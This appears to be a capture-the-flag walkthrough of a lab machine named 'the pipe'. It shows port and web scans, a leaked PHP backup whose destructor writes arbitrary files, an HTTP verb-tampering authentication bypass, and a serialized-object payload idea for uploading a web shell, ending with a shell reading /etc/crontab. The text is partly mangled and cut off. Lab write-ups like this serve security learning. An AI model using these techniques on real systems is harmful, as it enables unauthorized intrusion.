Using arp-scan as routine to detect the target’s IP address (10.1.1.143 in this case).
12345678910
root@kali:~# arp-scan -l
Interface: eth0, datalink type: EN10MB (Ethernet)Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)10.1.1.1 00:50:56:c0:00:08 VMware, Inc.
10.1.1.2 00:50:56:fd:d1:6b VMware, Inc.
10.1.1.143 00:0c:29:64:39:5e VMware, Inc.
10.1.1.254 00:50:56:f5:74:35 VMware, Inc.
4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9: 256 hosts scanned in 2.657 seconds (96.35 hosts/sec). 4 responded
10.1.1.143 is our Target!
Then run masscan to detect opening ports on the target (masscan is much faster than nmap when doing a full ports scan, so here I use it to make a full scan and then use nmap to do a deep scan on target ports).
12345678910
root@kali:~# masscan -p1-65535 10.1.1.143/32 --rate=10000
Starting masscan 1.0.3 (http://bit.ly/14GZzcT) at 2015-11-21 00:47:26 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]Discovered open port 40117/tcp on 10.1.1.143
Discovered open port 111/tcp on 10.1.1.143
Discovered open port 80/tcp on 10.1.1.143
Discovered open port 22/tcp on 10.1.1.143
There are 4 ports (22, 80, 111, 40117) detected by masscan, then I run nmap to do a deeper service scan.
# Nmap 6.49BETA5 scan initiated Tue Nov 17 05:50:42 2015 as: nmap -sV -v -O -A -T4 -p80,22,111,44161 -oN 10.1.1.143_nmap.txt 10.1.1.143Nmap scan report for 10.1.1.143
Host is up (0.00035s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5(protocol 2.0)| ssh-hostkey:
|1024 16:48:50:89:e7:c9:1f:90:ff:15:d8:3e:ce:ea:53:8f (DSA)|2048 ca:f9:85:be:d7:36:47:51:4f:e6:27:84:72:eb:e8:18 (RSA)|_ 256 d8:47:a0:87:84:b2:eb:f5:be:fc:1c:f1:c9:7f:e3:52 (ECDSA)80/tcp open http Apache httpd
| http-auth:
| HTTP/1.1 401 Unauthorized
|_ Basic realm=index.php
|_http-methods: No Allow or Public header in OPTIONS response (status code 401)|_http-server-header: Apache
|_http-title: 401 Unauthorized
111/tcp open rpcbind 2-4 (RPC #100000)| rpcinfo:
| program version port/proto service
|100000 2,3,4 111/tcp rpcbind
|100000 2,3,4 111/udp rpcbind
|1000241 37301/udp status
|_ 1000241 44161/tcp status
44161/tcp open status 1(RPC #100024)MAC Address: 00:0C:29:64:39:5E (VMware)Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.19
Uptime guess: 0.001 days (since Tue Nov 17 05:49:56 2015)Network Distance: 1 hop
... turncate ...
Due to port 80 is open (providing web service on the target server), run Nikto to do a web vuln scan:
12345678910111213141516171819202122232425262728
root@kali:~/the_pipe# nikto -host 10.1.1.143
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.1.1.143
+ Target Hostname: 10.1.1.143
+ Target Port: 80
+ Start Time: 2015-11-20 19:53:42 (GMT-5)---------------------------------------------------------------------------
+ Server: Apache
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type+ / - Requires Authentication for realm 'index.php'+ No CGI Directories found (use '-C all' to force check all possible dirs)+ / - Requires Authentication for realm 'index.php'+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: IIS may reveal its internal or real IP in the Location header via a request to the /images directory. The value is "http://127.0.1.1/images/".
... turncat ...
+ / - Requires Authentication for realm 'index.php'... turncat ...
+ OSVDB-3268: /images/: Directory indexing found.
+ / - Requires Authentication for realm 'index.php'+ OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found.
+ / - Requires Authentication for realm 'index.php'+ 7667 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2015-11-20 19:54:03 (GMT-5)(21 seconds)---------------------------------------------------------------------------
+ 1 host(s) tested
Nikto scan could not find any suspicious footprint, then I try Dirbuster to brute force hidden folders / files:
Two source code files discovered in folder ‘scriptz’:
12
/scriptz/log.php.BAK
/scriptz/php.js
Analyze the first file “log.php.BAK”, this is a backup of “log.php” obviously, so if I can find / run “log.php” I would be able to upload shell to the target server:
12345678910111213141516171819202122232425262728
<\?phpclassLog{public$filename='';public$data='';publicfunction__construct(){$this->filename='';$this->data='';}publicfunctionPrintLog(){$pre="[LOG]";$now=date('Y-m-d H:i:s');$str='$pre - $now - $this->data';eval("\$str = \"$str\";"); echo $str; } public function __destruct() { file_put_contents($this->filename, $this->data, FILE_APPEND); // <== Here we can write any code into any file }}\?>
Both nmap and nikto results show us that index.php exists under the root path and it requires Basic authentication to access this page.
root@kali:~/the_pipe# nmap -p 80 --script http-method-tamper --script-args 'http-method-tamper.paths={/index.php}' 10.1.1.143
Starting Nmap 6.49BETA5 ( https://nmap.org ) at 2015-11-20 21:57 EST
Nmap scan report for 10.1.1.143
Host is up (0.00024s latency).
PORT STATE SERVICE
80/tcp open http
| http-method-tamper:
| VULNERABLE:
| Authentication bypass by HTTP verb tampering
| State: VULNERABLE (Exploitable)| This web server contains password protected resources vulnerable to authentication bypass
| vulnerabilities via HTTP verb tampering. This is often found in web servers that only limit access to the
| common HTTP methods and in misconfigured .htaccess files.
|| Extra information:
|| URIs suspected to be vulnerable to HTTP verb tampering:
| /index.php [POST]|| References:
| https://www.owasp.org/index.php/Testing_for_HTTP_Methods_and_XST_%28OWASP-CM-008%29
| http://capec.mitre.org/data/definitions/274.html
| http://www.imperva.com/resources/glossary/http_verb_tampering.html
|_ http://www.mkit.com.ar/labs/htexploit/
MAC Address: 00:0C:29:64:39:5E (VMware)Nmap done: 1 IP address (1 host up) scanned in 0.91 seconds
It is vulnerable to POST method, so now I start up burp proxy to bypass the authentication and got the protected page:
<html><head><metahttp-equiv="Content-Type"content="text/html; charset=UTF-8"><scriptsrc="scriptz/php.js"></script><script>functionsubmit_form(){varobject=serialize({id:1,firstname:'Rene',surname:'Margitte',artwork:'The Treachery of Images'});object=object.substr(object.indexOf("{"),object.length);object="O:4:\"Info\":4:"+object;document.forms[0].param.value=object;document.getElementById('info_form').submit();}</script><title>TheTreacheryofImages</title></head><h1><i>TheTreacheryofImages</i></h1><hr/>FromWikipedia,thefreeencyclopedia<br/><br/>TheTreacheryofImages(French:Latrahisondesimages,1928–29,sometimestranslatedasTheTreasonofImages)isapaintingbytheBelgiansurrealistpainterRenéMagritte,paintedwhenMagrittewas30yearsold.Thepictureshowsapipe.Belowit,Magrittepainted,"Ceci n'est pas une pipe."[sə.sinepaz‿ynpip],Frenchfor"This is not a pipe."<p>"The famous pipe. How people reproached me for it! And yet, could you stuff my pipe? No, it's just a representation, is it not? So if I had written on my picture 'This is a pipe', I'd have been lying!"</p>Hisstatementistakentomeanthatthepaintingitselfisnotapipe.Thepaintingismerelyanimageofapipe.Hence,thedescription,"this is not a pipe."Thethemeofpipeswiththetext"Ceci n'est pas une pipe"isextendedinhis1966painting,LesDeuxMystères.ItiscurrentlyondisplayattheLosAngelesCountyMuseumofArt.Thepaintingissometimesgivenasanexampleofmetamessageconveyedbyparalanguage.ComparewithKorzybski's"The word is not the thing"and"The map is not the territory".<br/><br/><center><divstyle="width:500px;overflow:hidden;"><imgsrc="images/pipe.jpg"width="400px"height="auto"border="1"></div><formaction="index.php"id="info_form"method="POST"><inputtype="hidden"name="param"value=""/><ahref="#"onclick="submit_form(); return false;">ShowArtistInfo.</a></form></center></html>
It loads scriptz/php.js and there is a link pointing to function submit_form with a hidden value param, then I use burp proxy to check what data will be sent when I click the link Show Artist Info, after URL decoded, I found the following data:
1
O:4:"Info":4:{s:2:"id";i:1;s:9:"firstname";s:4:"Rene";s:7:"surname";s:8:"Margitte";s:7:"artwork";s:23:"The Treachery of Images";}
After a close look at the source code in php.js, Log.php.BAK and index.php, I can manage to construct the following payload to upload a web shell:
Here we noticed that system doing backup automatically, so I go to check cron entry in /etc/crontab:
12345678910111213141516171819
www-data@pipe:/home/rene$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * root /root/create_backup.sh
*/5 * * * * root /usr/bin/compress.sh
Trying to check the script code in both .sh file, but only /usr/bin/compress.sh can be read: